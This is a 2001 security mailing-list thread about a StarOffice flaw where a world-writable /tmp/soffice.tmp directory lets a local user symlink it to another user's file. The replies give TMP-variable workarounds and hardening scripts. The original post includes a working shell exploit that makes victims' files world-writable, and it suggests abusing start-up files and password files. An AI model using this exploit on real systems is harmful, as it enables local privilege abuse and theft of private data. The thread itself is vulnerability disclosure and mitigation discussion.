Re: HeliSec: StarOffice symlink exploit
I reported this problem to BUGTRAQ on November 8, 2000. See http://www.securityfocus.com/bid/1922 for more details. I believe Sun has now released patches for this issue. It always helps to do a search before reporting a "new" vulnerability. :-) Regards, Christian. Hi Christian, I had already saw your post when I sent the mine ;-) I know that this vulnerability is not new, and I didn't say that it was. I have included an exploit because there was none for this flaw, and I have explained a little more how to fix the problem. Thank u for the info, regards: JeT Li -The Wushu Master- _ Do You Yahoo!? Get your free @yahoo.com address at http://mail.yahoo.com
Re: HeliSec: StarOffice symlink exploit
StarOffice creates a temporary directory in /tmp called soffice.tmp, with permissions 0777. Into this directory other temporary files are creates, with the format: sv.tmp, where in a four or five digits number. Staroffice honors $TMP, so create /home/foo/tmp and set your TMP variable. This is not a solution per se I know, but it does help (and more and more apps are honoring the $TMP/$TMPDIR variable). Kurt Seifried, [EMAIL PROTECTED] Securityportal - your focal point for security on the 'net
Re: HeliSec: StarOffice symlink exploit
On Sat, Feb 17, 2001 at 04:57:23PM +0100, JeT Li wrote: One way to fix the problem is to create a directory inside your home directory which is inaccessible to anyone but yourself (permissions 700), called tmp. Then insert an entry in your login start-up file to set the $TMP environment variable to $HOME/tmp, so it will direct StarOffice to use your temporary directory, rather than the system /tmp. Something like this (in bash): [wushu@JeT-Li]$ TMP=$HOME/tmp ; export TMP (not permanent) or modify the .bash_profile adding TMP=$HOME/tmp and including this variable in the export. BTW, I have some fairly sophisticated TMPDIR/TMP scripts in the CVS repository for Bastille (http://sourceforge.net/projects/bastille-linux) that folks might find useful. The scripts allow you to put TMPDIR somewhere other than $HOME (say, local /tmp if $HOME is on NFS), to keep track of TMPDIRs on a host-by-host basis, to hide the number of files and last access time of $TMPDIR, etc. There's also an ancillary script designed to keep pruning tools like 'tmpwatch' (frequently found on Linux systems) from removing $TMPDIR while you're logged in, and to warn you via multiple channels if something is amiss with your temp dir. Look for bastille-tmpdir.sh, bastille-tmpdir.csh, and bastille-tmpdir-defense.sh (the anti-'tmpwatch' tool). bastille-tmpdir.* go in /etc/profile.d where many systems will run them at login time (via /etc/bashrc or /etc/csh.login scanning /etc/profile.d) bastille-tmpdir-defense.sh goes in /etc. All three should be mode 0755. These apps will be optional in the soon-to-be-release Bastille 1.2.0 hardening tool for Red Hat and Mandrake Linux distributions. I've only tested the scripts under Linux, but they should be fairly portable. Your feedback would be most appreciated. It's nice that apps let you pick your own preferred temp space ($HOME in some cases is a poor choice), but it's a shame that some apps *need* you to do so to behave safely. :-( -Peter
HeliSec: StarOffice symlink exploit
- = Helios Security and Administration = - Hi everyone, StarOffice creates a temporary directory in /tmp called soffice.tmp, with permissions 0777. Into this directory other temporary files are creates, with the format: sv.tmp, where in a four or five digits number. StarOffice not only create the /tmp/soffice.tmp directory with permissions 0777, but also chmod() it sometimes when StarOffice is runing afterwards. If any user create a symbolic link from /tmp/soffice.tmp to any file owned by other user, when this last user run StarOffice the target of the link will become 0777. So, if the directory of the target file is accessible by the maliciosous user that created the symlink, he can do whatever he wants with the file. A few ways to exploit this is: - to modify shell start-up files (as .profile, .bashrc, .cshrc, etc.) to execute whatever the hackers wants next time victim logs in. - to gain access to private files with sensitive information, as passwords files, mail spool files, etc. - a lot of more evil acts. StarOffice no give error message or such when it change the permissions of the target file, so from the victim point of view: all is going right ;-) Requeriments: - Access to the targe file directory needed. - The target file must NOT be executable. Fix: One way to fix the problem is to create a directory inside your home directory which is inaccessible to anyone but yourself (permissions 700), called tmp. Then insert an entry in your login start-up file to set the $TMP environment variable to $HOME/tmp, so it will direct StarOffice to use your temporary directory, rather than the system /tmp. Something like this (in bash): [wushu@JeT-Li]$ TMP=$HOME/tmp ; export TMP (not permanent) or modify the .bash_profile adding TMP=$HOME/tmp and including this variable in the export. Here is the xploit code, to make sure that this will work, run first staroffice, so you will become owner of /tmp/soffice.tmp, necessary to remove it and create the symlink. #!/bin/sh SOFFICE="/tmp/soffice.tmp" TARGETFILE=$1 if [ $# != 1 ]; then echo echo " - = HeliSec - Helios Security and Administration = -" echo "Usage : " echo "./soffice.sh file" echo "Set 0777 permissions to any file (access to the directory of the file needed)" echo " JeT Li -The Wushu Master-" exit fi if [ ! -f ${TARGETFILE} ]; then echo "Target file must exist" exit fi rm -rf ${SOFFICE} ln -sn ${TARGETFILE} ${SOFFICE} echo echo "Symbolik link done ..." echo perl -e '$a=`ps aux | grep office`; $a =~ /soffice\.bin/ ? print "StarOffice is running on this machine ... wait a minutes and the permissions will have been set.\n" : print "StarOffice is not running on this machine ...you may wait for the signal (not recommended) or CTRL+C the program; when the user run StarOffice the permissions will be set automaticly\n";' while : do if [ `ls -al ${TARGETFILE} | awk '{printf $1}'` = "-rwxrwxrwx" ]; then echo echo "Permissions set succesfully ... good luck ;-)" echo echo "- = HeliSec - Helios Security and Administration = -" echo "JeT Li-The Wushu Master-" exit fi done Cheers, JeT Li -The Wushu Master- _ Do You Yahoo!? Get your free @yahoo.com address at http://mail.yahoo.com